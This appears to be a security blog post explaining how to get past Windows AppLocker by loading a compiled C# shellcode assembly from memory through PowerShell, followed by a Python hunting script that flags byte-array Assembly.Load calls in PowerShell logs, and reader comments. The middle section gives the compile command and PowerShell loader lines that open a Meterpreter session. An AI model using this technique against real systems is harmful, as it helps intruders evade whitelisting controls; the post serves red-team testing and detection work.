In an environment where AppLocker is enabled, it is still possible to run an executable because of the way assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and presented at ShmooCon 2015. The Assembly Load method can load a file from three different locations:
- Memory // Byte[]
- Location on the disk
- From a URL
The .NET assembly is initially loaded with Read permissions in order to enumerate the methods and properties associated with the binary; the permissions are then changed to Execute, so AppLocker or any other whitelisting application cannot identify that something was executed on the system.
Bypassing AppLocker with this method consists of three steps:
- Generate C# ShellCode
- Compile the .NET application
- Execute ShellCode from Memory with Assembly Load
Metasploit MSFvenom can be used to generate C# shellcode:

The shellcode above can be inserted into the C# file, which can then be compiled with the csc utility, part of the .NET Framework, to generate the executable.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:shellcode.exe shellcode.cs

Running the executable directly or from PowerShell will fail, since this binary is not whitelisted by an AppLocker rule.


However, this restriction can be bypassed from PowerShell by loading the assembly from memory and invoking the shellcode, which is defined as a method inside the file.
public class Shellcode {
    public static void Exec() {
        // native function's compiled code
        byte[] shellcode = new byte[354] {
The following needs to be executed from PowerShell:
$bytes = [System.IO.File]::ReadAllBytes("C:\shellcode.exe")
[Reflection.Assembly]::Load($bytes)
[Shellcode]::Exec()

The shellcode will be executed and a Meterpreter session will open.
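From the defender's side, the PowerShell step above is what Script Block Logging (event ID 4104) records, so a hunt can look for `Assembly.Load` being fed a byte array rather than an assembly name or path. The following Python is an added example, not code from the original post; it assumes the script block text has already been exported from the event log, and the function names and sample strings are constructed for illustration.

```python
import re

# Byte-array producers, named after the load locations the article lists.
BYTE_SOURCES = {
    "disk": re.compile(r"\[(?:System\.)?IO\.File\]::ReadAllBytes\s*\(", re.I),
    "url": re.compile(r"\.DownloadData\s*\(", re.I),
    "memory": re.compile(r"\[(?:System\.)?Convert\]::FromBase64String\s*\(", re.I),
}
# $var = <expression up to ';' or end of line>
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;\r\n]+)")
# Assembly.Load(<arg>); requiring "(" right after Load skips LoadFrom/LoadFile.
ASM_LOAD = re.compile(
    r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(\s*([^)\r\n]*)", re.I)

# Constructed script-block texts (not real logs); the first mirrors the article.
SAMPLE_SCRIPT_BLOCKS = [
    '$bytes = [System.IO.File]::ReadAllBytes("C:\\shellcode.exe")\n'
    '[Reflection.Assembly]::Load($bytes)\n[Shellcode]::Exec()',
    '[Reflection.Assembly]::Load("System.Windows.Forms")',       # load by name
    '[Reflection.Assembly]::LoadFrom("C:\\Tools\\report.dll")',  # path-based
]

def classify(expr):
    """Return which byte source appears in expr, or None."""
    for name, pattern in BYTE_SOURCES.items():
        if pattern.search(expr):
            return name
    return None

def find_byte_array_loads(script_text):
    """Return one finding per Assembly.Load call that is fed raw bytes."""
    tainted = {}  # variable name -> byte source it was assigned from
    for var, expr in ASSIGN.findall(script_text):
        source = classify(expr)
        if source:
            tainted[var.lower()] = source
    findings = []
    for match in ASM_LOAD.finditer(script_text):
        arg = match.group(1).strip()
        source = classify(arg)  # inline form: Load([IO.File]::ReadAllBytes(..))
        if source is None and arg.startswith("$"):
            source = tainted.get(arg[1:].lower())
        if source:
            findings.append({"source": source, "argument": arg})
    return findings

if __name__ == "__main__":
    for text in SAMPLE_SCRIPT_BLOCKS:
        print(find_byte_array_loads(text))
```

Only the first sample is flagged; loading by assembly name and `LoadFrom` with a path go through the normal file-based load and are left alone.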

Thanks!
In case of using the ConstrainedLanguage setting for PowerShell, do you know if this prevents this method?
Thanks again!
That should work!